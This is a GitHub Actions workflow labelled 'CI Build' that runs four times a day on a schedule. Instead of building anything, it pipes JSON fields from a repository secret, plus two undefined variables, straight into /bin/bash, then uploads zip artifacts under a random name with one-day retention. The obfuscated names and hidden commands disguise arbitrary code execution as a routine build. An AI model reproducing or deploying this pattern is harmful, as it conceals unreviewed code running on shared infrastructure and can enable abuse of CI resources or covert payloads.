name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          h140: ${{ secrets.h140 }}
        run: |
          printf '%s' "$h140" | jq -r .drzr16174 | /bin/bash
          printf '%s' "$n16361" | jq -r .ipzrt128 | /bin/bash
          printf '%s' "$k5" | jq -r .t43664 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: PJZFmi9R
          path: "*.zip"
          retention-days: 1
